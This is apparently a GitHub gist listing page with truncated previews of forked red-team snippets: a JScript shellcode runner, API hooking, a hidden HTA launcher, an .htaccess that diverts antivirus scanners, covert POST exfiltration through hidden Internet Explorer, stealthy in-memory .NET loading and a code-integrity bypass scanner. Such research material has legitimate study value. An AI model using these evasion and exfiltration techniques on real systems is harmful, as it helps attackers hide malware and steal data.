ohio813
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
ohio813
/ Injectable.cpp
Created
August 23, 2018 23:29
— forked from leoloobeek/Injectable.cpp
Simple UserMode Hook Example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
ohio813
/ example.hta
Created
August 23, 2018 23:28
— forked from leoloobeek/example.hta
HTA example for
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script language="JScript"> | |
| // HTA skeleton taken from https://github.com/zerosum0x0/koadic | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try | |
| { |
ohio813
/ exeoutputsearch.ps1
Created
August 23, 2018 23:21
— forked from curi0usJack/exeoutputsearch.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $exepath = "c:\windows" | |
| $searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path") | |
| $skip = @("logoff.exe", "mcrmgr.exe", "audit.exe") | |
| $foundin = @() | |
| $testedbins = @() | |
| Function Execute-Command ($commandPath, $commandArguments) | |
| { | |
| $pinfo = New-Object System.Diagnostics.ProcessStartInfo | |
| $pinfo.FileName = $commandPath |
ohio813
/ CmdlineProcessArgCheck.vbs
Created
August 23, 2018 23:21
— forked from curi0usJack/CmdlineProcessArgCheck.vbs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE | |
| strComputer = "." | |
| strKey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" | |
| Set objLocator = CreateObject("WbemScripting.SWbemLocator") | |
| Set objReg = objLocator.ConnectServer(strComputer, "root\cimv2").Get("StdRegProv") | |
| objReg.EnumKey HKLM, strKey, arrSubKeys | |
| objReg.GetDWORDValue HKLM, strkey, "ProcessCreationIncludeCmdLine_Enabled", isenabled | |
| If IsNull(isenabled) Then |
ohio813
/ .htaccess
Created
August 23, 2018 23:14
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
ohio813
/ ie_com.cs
Created
August 23, 2018 22:59
— forked from leoloobeek/ie_com.cs
InternetExplorer.Application PoC's
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // sample function that takes in a destination server, POST data, and custom HTTP request headers | |
| private string SendData(string dst, byte[] postData, string customHeaders) | |
| { | |
| Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
| object IE = Activator.CreateInstance(com_type); | |
| object[] falseArr = new object[] { false }; | |
| object[] trueArr = new object[] { true }; | |
| com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
| com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |
ohio813
/ TrustedHashes.csv
Created
August 19, 2018 11:16
— forked from mattifestation/TrustedHashes.csv
All catalog hashes extracted from a mounted install.wim from en_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090741.iso
We can't make this file beautiful and searchable because it's too large.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "Algorithm","Hash","CatalogPath","Hint" | |
| "SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","F5EEEC38876E48617643A9E735A30B9EC3D08D77075CD81F239A15626E3F7DD5","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","4BA33EC224E42FC929BA6487041C2C4275C5BCA66CD89471A09BC7F522A5661F","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", | |
| "SHA256","71A0AEC9941BA21780C3BED570AEAF3BC5B9473BB6662F7CAF194F33C0E1B918","C:\Windows\InfusedApps\Frameworks\Microsoft.Advertising.Xaml_10.1705.4.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat", |
ohio813
/ LoadInMemoryModule.ps1
Created
August 19, 2018 11:12
— forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
ohio813
/ LoadMethodScanner.ps1
Created
August 19, 2018 11:05
— forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |